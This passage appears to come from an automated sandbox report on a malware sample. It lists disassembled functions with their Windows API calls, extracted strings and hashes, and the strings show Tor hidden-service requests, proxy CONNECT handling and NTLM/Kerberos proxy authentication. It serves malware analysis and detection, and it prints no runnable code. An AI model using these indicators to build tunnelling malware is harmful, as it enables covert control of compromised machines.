              • Associated: 00000000.00000002.2254302274.00000000009B9000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2254333795.00000000009BB000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_9a0000_6K1uYM85lS.jbxd
              Similarity
              • API ID: inet_ntop
              • String ID: p $r $r $s $<
              • API String ID: 448242623-3079122765
              • Opcode ID: e8062f011a07f8168f02d68d9fea683a2c4ce82a49656b52e4b56a59eeee229d
              • Instruction ID: ee75ffdb818e763d7030fd1c18c1a993d4cb38ce0686220c5352f1ed408651be
              • Opcode Fuzzy Hash: e8062f011a07f8168f02d68d9fea683a2c4ce82a49656b52e4b56a59eeee229d
              • Instruction Fuzzy Hash: B8D15B719142699FDF24CBA4CD44FFAB7B9BF49300F0085DAE609A6291DB749E84CF60
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
                • Part of subcall function 009A3330: HeapAlloc.KERNEL32(00000000,00000008,?), ref: 009A3370
                • Part of subcall function 009A3330: HeapReAlloc.KERNEL32(00000000,00000008,00000000,?), ref: 009A338E
                • Part of subcall function 009A3330: Sleep.KERNEL32(000007D0), ref: 009A33A2
              • memmove.MSVCRT ref: 009AB14F
              • memmove.MSVCRT ref: 009AB16D
              • memmove.MSVCRT ref: 009AB1A2
                • Part of subcall function 009A23C0: CryptEncrypt.ADVAPI32(?,00000000,00000001,00000040,00000000,?,00000000,00000000,?,009AB263,?,00000000,00000056,00000080), ref: 009A23E2
              • memmove.MSVCRT ref: 009AB22A
              • memmove.MSVCRT ref: 009AB241
              • memmove.MSVCRT ref: 009AB2A7
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2254157800.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
              • Associated: 00000000.00000002.2253920637.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2254202198.00000000009B5000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2254302274.00000000009B9000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2254333795.00000000009BB000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_9a0000_6K1uYM85lS.jbxd
              Similarity
              • API ID: memmove$AllocHeap$CryptEncryptSleep
              • String ID: F$V
              • API String ID: 3676980526-4172692743
              • Opcode ID: 2217d7496ca878cabe019d16de5d2704994eb085fb81a13faa4d5a4ca02b88e7
              • Instruction ID: a2454a5d61a34b71efd3ace3884632d80e03f65a5f91161fab14c251ee3169b4
              • Opcode Fuzzy Hash: 2217d7496ca878cabe019d16de5d2704994eb085fb81a13faa4d5a4ca02b88e7
              • Instruction Fuzzy Hash: 7C5121B6D04109ABDB04DFD8DC81FEFB779AF99300F048518F515B7242EA359A18CBA5
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
                • Part of subcall function 009A2100: memmove.MSVCRT ref: 009A210F
              • lstrlenA.KERNEL32(?,00000000), ref: 009A77A9
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2254157800.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
              • Associated: 00000000.00000002.2253920637.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2254202198.00000000009B5000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2254302274.00000000009B9000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2254333795.00000000009BB000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_9a0000_6K1uYM85lS.jbxd
              Similarity
              • API ID: lstrlenmemmove
              • String ID: HTTP/1.0 %s$HTTP/1.0 200 OK$HTTP/1.0 403 Forbidden$HTTP/1.0 404 Not Found$HTTP/1.0 500 Internal Server Error$HTTP/1.0 502 Bad Gateway$HTTP/1.0 504 Gateway Timeout
              • API String ID: 4100021496-2506370377
              • Opcode ID: a30db8db2be71108799d483a234bc82c4af891ce9e83d3d5d4aa99160fb31e64
              • Instruction ID: 91e1f383081d9c723ac83aa026f04a50b0df87fa5ba4340c3370c3bda56e215a
              • Opcode Fuzzy Hash: a30db8db2be71108799d483a234bc82c4af891ce9e83d3d5d4aa99160fb31e64
              • Instruction Fuzzy Hash: 594178B5D1C3689EDB24DB94DC42FEDB775AB45704F0480D9E909A6282E7B01B88CFA1
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              Memory Dump Source
              • Source File: 00000000.00000002.2254157800.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
              • Associated: 00000000.00000002.2253920637.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2254202198.00000000009B5000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2254302274.00000000009B9000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2254333795.00000000009BB000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_9a0000_6K1uYM85lS.jbxd
              Similarity
              • API ID: memmove$htons$htonl
              • String ID:
              • API String ID: 2070112683-0
              • Opcode ID: 2f1bfc1e6f81d152ee38c91565afad1e609ffe7f45832dab6bc4193648bdcc29
              • Instruction ID: 5be7f18e563dec00dbac76d1becb0192c1f52fe2ba17c399182350b736789bd0
              • Opcode Fuzzy Hash: 2f1bfc1e6f81d152ee38c91565afad1e609ffe7f45832dab6bc4193648bdcc29
              • Instruction Fuzzy Hash: F8D1BA70E0819A8BDB04CB94C594AFEB7F6AF42305F2881A9D4957B242C3755F84DBB2
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
                • Part of subcall function 009A35D0: EnterCriticalSection.KERNEL32(00000001,00000001,?,009B403F,00000001,?,009B3F8F,-00000007,?,009AEEB2,-00000053,?,009AEE82,-00804C3B,?,009AED83), ref: 009A35DB
              • shutdown.WS2_32(?,00000001), ref: 009AC78B
              • shutdown.WS2_32(?,?), ref: 009AC7B8
              • shutdown.WS2_32(?,00000002), ref: 009AC7F2
              • shutdown.WS2_32(?,00000002), ref: 009AC804
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2254157800.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
              • Associated: 00000000.00000002.2253920637.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2254202198.00000000009B5000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2254302274.00000000009B9000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2254333795.00000000009BB000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_9a0000_6K1uYM85lS.jbxd
              Similarity
              • API ID: shutdown$CriticalEnterSection
              • String ID: 502 Bad Gateway$CONNECT
              • API String ID: 2480472672-1541487254
              • Opcode ID: 205c0c5bd39437a938730ab39347d3985d79b643035892e18429331c946bb765
              • Instruction ID: 7e1d752ee954be8b8694fa01766a41eaff652e89328df38e8fe1079f4836c43d
              • Opcode Fuzzy Hash: 205c0c5bd39437a938730ab39347d3985d79b643035892e18429331c946bb765
              • Instruction Fuzzy Hash: 54717274B00245ABDB08DB65C891BBE7B75BF83315F0881A8F9859F2C3DB359A41CB91
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • GetLogicalDrives.KERNEL32 ref: 009B0876
              • RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer,00000000,00020019,?), ref: 009B08C4
              • RegQueryValueExW.ADVAPI32(?,NoDrives,00000000,00000000,00000000,00000004), ref: 009B08F1
              • RegCloseKey.ADVAPI32(?), ref: 009B090E
              Strings
              • NoDrives, xrefs: 009B08E8
              • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer, xrefs: 009B08B7
              Memory Dump Source
              • Source File: 00000000.00000002.2254157800.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
              • Associated: 00000000.00000002.2253920637.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2254202198.00000000009B5000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2254302274.00000000009B9000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2254333795.00000000009BB000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_9a0000_6K1uYM85lS.jbxd
              Similarity
              • API ID: CloseDrivesLogicalOpenQueryValue
              • String ID: NoDrives$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
              • API String ID: 2666887985-3471754645
              • Opcode ID: afd961fd5284ae08c413ffa3fafb6a4cac690b99ee4b684a8b9135ba43a1bf15
              • Instruction ID: 78700737bd4ebaff96adda6e9a521bc8e5a955517c7c631a4444d27f544ea34b
              • Opcode Fuzzy Hash: afd961fd5284ae08c413ffa3fafb6a4cac690b99ee4b684a8b9135ba43a1bf15
              • Instruction Fuzzy Hash: E811F970E0020AABEB14DFD0CA49BFFB7B4BB48714F108148E515B7280D3B86A45CF91
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • InternetOpenA.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36,00000001,00000000,00000000,00000000), ref: 009B0387
              • InternetOpenUrlA.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 009B03A6
              • HttpQueryInfoA.WININET(00000000,20000005,?,00000004,00000000), ref: 009B03CF
              • InternetCloseHandle.WININET(00000000), ref: 009B03F8
              • InternetCloseHandle.WININET(00000000), ref: 009B0402
              Strings
              • Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36, xrefs: 009B0382
              Memory Dump Source
              • Source File: 00000000.00000002.2254157800.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
              • Associated: 00000000.00000002.2253920637.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2254202198.00000000009B5000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2254302274.00000000009B9000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2254333795.00000000009BB000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_9a0000_6K1uYM85lS.jbxd
              Similarity
              • API ID: Internet$CloseHandleOpen$HttpInfoQuery
              • String ID: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
              • API String ID: 3871184103-255850170
              • Opcode ID: 4a5f86a675bb57e5dfd37b0e29cdd0a289267c250a9c50e0c542be8d57301adb
              • Instruction ID: 24df36eda5c8be764aed106aaf10978707bfeba0b0fedfa0c696009db8cf22cb
              • Opcode Fuzzy Hash: 4a5f86a675bb57e5dfd37b0e29cdd0a289267c250a9c50e0c542be8d57301adb
              • Instruction Fuzzy Hash: 54115B74A41248FBDB10DFA4CD49FEEB7B9AB44710F108588EA116B2D0C7B5AA00CB50
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • lstrlenA.KERNEL32(00000000), ref: 009A3FD3
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2254157800.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
              • Associated: 00000000.00000002.2253920637.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2254202198.00000000009B5000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2254302274.00000000009B9000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2254333795.00000000009BB000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_9a0000_6K1uYM85lS.jbxd
              Similarity
              • API ID: lstrlen
              • String ID: %hu$://$http=$https=$socks=
              • API String ID: 1659193697-336120641
              • Opcode ID: 347bcb162459364b85fcdccb832f984dc39fd941ec30c61f0ad90cf12059af41
              • Instruction ID: d1432125d3dcd289983d4d29b225c8ade581255b1e8117c132ee7df3a6017adb
              • Opcode Fuzzy Hash: 347bcb162459364b85fcdccb832f984dc39fd941ec30c61f0ad90cf12059af41
              • Instruction Fuzzy Hash: 12919A70A14219DFDB10CFA4C988BAEBBB5BF49304F24C498E545AB281DB759E84DFD0
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • lstrlenA.KERNEL32(-00000104), ref: 009A47C6
                • Part of subcall function 009A2100: memmove.MSVCRT ref: 009A210F
              • lstrlenA.KERNEL32(00000000), ref: 009A48E7
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2254157800.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
              • Associated: 00000000.00000002.2253920637.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2254202198.00000000009B5000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2254302274.00000000009B9000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2254333795.00000000009BB000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_9a0000_6K1uYM85lS.jbxd
              Similarity
              • API ID: lstrlen$memmove
              • String ID: Kerberos $NTLM $Negotiate $Proxy-Authorization: %s %s
              • API String ID: 1832346882-695359478
              • Opcode ID: 569db95cddf88370799fb1e40ebcb89814b92018654d297b8499e75c7519f8cb
              • Instruction ID: 5e53fc5d9414ab6216ec1704f06a1ec44b702cc3dcf1f0bb642b473d4d665901
              • Opcode Fuzzy Hash: 569db95cddf88370799fb1e40ebcb89814b92018654d297b8499e75c7519f8cb
              • Instruction Fuzzy Hash: 4A7183B5E04249AFDB00DF98D885FEEB7B5BF89304F148158F905AB381D774AA10CBA1
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
                • Part of subcall function 009A8FD0: closesocket.WS2_32(00000000), ref: 009A8FE7
                • Part of subcall function 009A8FD0: WaitForSingleObject.KERNEL32(00000000,00001388,00000000,?,009AE987,00000000,00000000,00000000), ref: 009A8FF9
                • Part of subcall function 009A8FD0: TerminateThread.KERNEL32(00000000,00000000,?,009AE987,00000000,00000000,00000000), ref: 009A9008
                • Part of subcall function 009A8FD0: CloseHandle.KERNEL32(00000000,?,009AE987,00000000,00000000,00000000), ref: 009A9014
              • Sleep.KERNEL32(000007D0,00000000,00000001,00000001,00000000), ref: 009AEA59
              • CloseHandle.KERNEL32(?), ref: 009AEA70
              • WaitForMultipleObjects.KERNEL32(?,?,00000001,000061A8), ref: 009AEA91
              • TerminateThread.KERNEL32(?,00000000), ref: 009AEAC7
              • CloseHandle.KERNEL32(?), ref: 009AEADB
              • WSACleanup.WS2_32 ref: 009AEB0E
              Memory Dump Source
              • Source File: 00000000.00000002.2254157800.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
              • Associated: 00000000.00000002.2253920637.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2254202198.00000000009B5000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2254302274.00000000009B9000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2254333795.00000000009BB000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_9a0000_6K1uYM85lS.jbxd
              Similarity
              • API ID: CloseHandle$TerminateThreadWait$CleanupMultipleObjectObjectsSingleSleepclosesocket
              • String ID:
              • API String ID: 3883441888-0
              • Opcode ID: 136cf4208b02c16a51384e808592711ea6ccb262d5dbeb4ab518f93c1845528c
              • Instruction ID: c78775856c8dc9cfcb1700a5f5c97b6819a3095268b19c68367abf05077db004
              • Opcode Fuzzy Hash: 136cf4208b02c16a51384e808592711ea6ccb262d5dbeb4ab518f93c1845528c
              • Instruction Fuzzy Hash: DB314D30A54204BFDB04EB94DD55F9EBB72BF85305F144184FA05AB3C1C6716A809BE4
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
                • Part of subcall function 009A3B80: GetTickCount.KERNEL32 ref: 009A3B86
              • htonl.WS2_32(?), ref: 009AD387
                • Part of subcall function 009A35D0: EnterCriticalSection.KERNEL32(00000001,00000001,?,009B403F,00000001,?,009B3F8F,-00000007,?,009AEEB2,-00000053,?,009AEE82,-00804C3B,?,009AED83), ref: 009A35DB
              • memcmp.MSVCRT ref: 009AD4AC
              • memmove.MSVCRT ref: 009AD520
              Strings
              • P, xrefs: 009AD417
              • GET /tor/rendezvous2/%s HTTP/1.1Host: localAccept-Encoding: identityUser-Agent: %s, xrefs: 009AD5B4
              Memory Dump Source
              • Source File: 00000000.00000002.2254157800.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
              • Associated: 00000000.00000002.2253920637.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2254202198.00000000009B5000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2254302274.00000000009B9000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2254333795.00000000009BB000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_9a0000_6K1uYM85lS.jbxd
              Similarity
              • API ID: CountCriticalEnterSectionTickhtonlmemcmpmemmove
              • String ID: GET /tor/rendezvous2/%s HTTP/1.1Host: localAccept-Encoding: identityUser-Agent: %s$P
              • API String ID: 495902089-332776292
              • Opcode ID: 2edbaefc4cd379cabc0504ff21b9093f01d09aae4da7a5ef417589d24c5e5f06
              • Instruction ID: 5d6c31f00e11066af83ae3193f1d36061081a0f5051fe55ad70b437a610e59bd
              • Opcode Fuzzy Hash: 2edbaefc4cd379cabc0504ff21b9093f01d09aae4da7a5ef417589d24c5e5f06
              • Instruction Fuzzy Hash: AEB1B4B4D0551A9BDB18DB98CC95BFEF3B5BF85304F0481ADE10A67282E7749A84CF90
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
                • Part of subcall function 009A2100: memmove.MSVCRT ref: 009A210F
              • inet_ntop.WS2_32(00000002,?,?,00000400), ref: 009A7DBD
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2254157800.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
              • Associated: 00000000.00000002.2253920637.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2254202198.00000000009B5000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2254302274.00000000009B9000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2254333795.00000000009BB000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_9a0000_6K1uYM85lS.jbxd
              Similarity
              • API ID: inet_ntopmemmove
              • String ID: -----END RSA PUBLIC KEY-----$http://%s:%hu/tor/server/fp/%s.z$onion-key$router %s %s
              • API String ID: 1410992348-1243584039
              • Opcode ID: c2f8134b12246b87a8ef986efd1bc688f7ebad4f35016056e2c126e891beaaa8
              • Instruction ID: f0e23894ea0432b1e773329f2fa8cf4d5bdcd68c565737dffd5d824d3b32ffbb
              • Opcode Fuzzy Hash: c2f8134b12246b87a8ef986efd1bc688f7ebad4f35016056e2c126e891beaaa8
              • Instruction Fuzzy Hash: E2818371A042189FDB24CB54CC82FE9B779BB95304F0481E9F60EAA282DB745F84CF91
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2254157800.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
              • Associated: 00000000.00000002.2253920637.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2254202198.00000000009B5000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2254302274.00000000009B9000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2254333795.00000000009BB000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_9a0000_6K1uYM85lS.jbxd
              Similarity
              • API ID: memmove$CompletionPostQueuedStatus
              • String ID: @
              • API String ID: 2107774671-2766056989
              • Opcode ID: 9928f5939ffc78866f7b417fd44227fe06ebfbbc5418445e4f124f578bb2f7ca
              • Instruction ID: 524bf4aff4882d7ef1c6787f1cf607922cf226c11905cdd238c38254bdf7f8bf
              • Opcode Fuzzy Hash: 9928f5939ffc78866f7b417fd44227fe06ebfbbc5418445e4f124f578bb2f7ca
              • Instruction Fuzzy Hash: 9E815274B00129AFDB26DF15DC91BA9B7B9BF95304F0080E9E5096B381DA369F85CF80
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
                • Part of subcall function 009A3B80: GetTickCount.KERNEL32 ref: 009A3B86
              • htonl.WS2_32(?), ref: 009AD387
                • Part of subcall function 009A35D0: EnterCriticalSection.KERNEL32(00000001,00000001,?,009B403F,00000001,?,009B3F8F,-00000007,?,009AEEB2,-00000053,?,009AEE82,-00804C3B,?,009AED83), ref: 009A35DB
              • memcmp.MSVCRT ref: 009AD4AC
              • memmove.MSVCRT ref: 009AD520
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2254157800.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
              • Associated: 00000000.00000002.2253920637.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2254202198.00000000009B5000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2254302274.00000000009B9000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2254333795.00000000009BB000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_9a0000_6K1uYM85lS.jbxd
              Similarity
              • API ID: CountCriticalEnterSectionTickhtonlmemcmpmemmove
              • String ID: P
              • API String ID: 495902089-3110715001
              • Opcode ID: 5e3a35d1365b5a2f43e2e6e91569404c1e2257988a8ed199e09e3dbe8b6d085b
              • Instruction ID: f3dc0808025ff7f659a6fa123178975ada8fbb4b81031b03c50a7ef3bc89c57e
              • Opcode Fuzzy Hash: 5e3a35d1365b5a2f43e2e6e91569404c1e2257988a8ed199e09e3dbe8b6d085b
              • Instruction Fuzzy Hash: 585197B4D0151A9BDB18DB94CC91BFEB776BF95304F0485A8F11AA7282E7349A44CF50
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • GetDriveTypeW.KERNEL32(009B07CF), ref: 009B07FD
              • QueryDosDeviceW.KERNEL32(009B07CF,?,00000208), ref: 009B083C
              • StrCmpNW.SHLWAPI(?,\??\,00000004), ref: 009B0854
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2254157800.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
              • Associated: 00000000.00000002.2253920637.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2254202198.00000000009B5000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2254302274.00000000009B9000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2254333795.00000000009BB000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_9a0000_6K1uYM85lS.jbxd
              Similarity
              • API ID: DeviceDriveQueryType
              • String ID: \??\
              • API String ID: 1681518211-3047946824
              • Opcode ID: 2f27d02baa6ac4741a39e755ba5dde9e5669e0fbf03cf1e3939435bde512728c
              • Instruction ID: 1dc5764a17c0bf284759a4156e92920b8e9997ea12aa87010cdcfd17bc5b2ed6
              • Opcode Fuzzy Hash: 2f27d02baa6ac4741a39e755ba5dde9e5669e0fbf03cf1e3939435bde512728c
              • Instruction Fuzzy Hash: EC01FFB4D4020CDBCB20DF95DE49BDAB7B8AB44714F0081A9EA09A7140D6719B85DFD4
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2254157800.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
              • Associated: 00000000.00000002.2253920637.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2254202198.00000000009B5000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2254302274.00000000009B9000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2254333795.00000000009BB000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_9a0000_6K1uYM85lS.jbxd
              Similarity
              • API ID: lstrlentask
              • String ID: %s %s %s$%s %s %s$://
              • API String ID: 773520081-748371927
              • Opcode ID: 54c1e9c195043bb65a6d9071a6556f6b5415e38f4f32ac33237d639db3ec19e1
              • Instruction ID: 5805850142b886633d1b2c24b4b91fc70465d9c72c9bca61f6dedc429be74959
              • Opcode Fuzzy Hash: 54c1e9c195043bb65a6d9071a6556f6b5415e38f4f32ac33237d639db3ec19e1
              • Instruction Fuzzy Hash: A491B171A042289FDF28CF64CC44BEEB7B9BF55304F088598F209A6291D7759E84CFA0
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • memcmp.MSVCRT ref: 009AD088
              • memmove.MSVCRT ref: 009AD0C5
              • lstrlenA.KERNEL32(?,00000003,00000004,00000000,00000003,0000000D,00000000,00000000,?,?,?,00000001), ref: 009AD167
              • htons.WS2_32(?), ref: 009AD23A
              Memory Dump Source
              • Source File: 00000000.00000002.2254157800.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
              • Associated: 00000000.00000002.2253920637.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2254202198.00000000009B5000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2254302274.00000000009B9000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2254333795.00000000009BB000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_9a0000_6K1uYM85lS.jbxd
              Similarity
              • API ID: htonslstrlenmemcmpmemmove
              • String ID:
              • API String ID: 302187628-0
              • Opcode ID: 48038ce5aea32d06a5396dcc5694d91b214282bb129d9d07b81e7c6b3e5c5228
              • Instruction ID: 7560c8f21855dfe16f89605a42c9dff0475f2e99c3942826db7f72cda0b085b7
              • Opcode Fuzzy Hash: 48038ce5aea32d06a5396dcc5694d91b214282bb129d9d07b81e7c6b3e5c5228
              • Instruction Fuzzy Hash: C6719170E0821A9BDB14CBA4DC91BFFB775AF85300F148119F9626B2C2D778A946CBD0
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2254157800.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
              • Associated: 00000000.00000002.2253920637.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2254202198.00000000009B5000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2254302274.00000000009B9000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2254333795.00000000009BB000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_9a0000_6K1uYM85lS.jbxd
              Similarity
              • API ID: memmove$memcmp
              • String ID: \
              • API String ID: 845337883-2967466578
              • Opcode ID: 74fcf3e4d10a9c81c09dcf7789ae585a115708f4be19fe9ccfb8603a070d1ead
              • Instruction ID: ab08f96c95187824746ad41d8495c8d0a4bae88f3910732f65a733fd65822e8d
              • Opcode Fuzzy Hash: 74fcf3e4d10a9c81c09dcf7789ae585a115708f4be19fe9ccfb8603a070d1ead
              • Instruction Fuzzy Hash: 8C71A470D0025C9BDB14CB54CC517EDBBB9AF9A304F1881E8E589AB243DB349B949F94
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • WSAStartup.WS2_32(00000202,?), ref: 009AE7C9
                • Part of subcall function 009A35B0: GetProcessHeap.KERNEL32(?,009AE7DC), ref: 009A35B3
              • WSACleanup.WS2_32 ref: 009AE9FF
                • Part of subcall function 009A3C60: GetSystemTimeAsFileTime.KERNEL32(?), ref: 009A3D9B
                • Part of subcall function 009A2120: memmove.MSVCRT ref: 009A2194
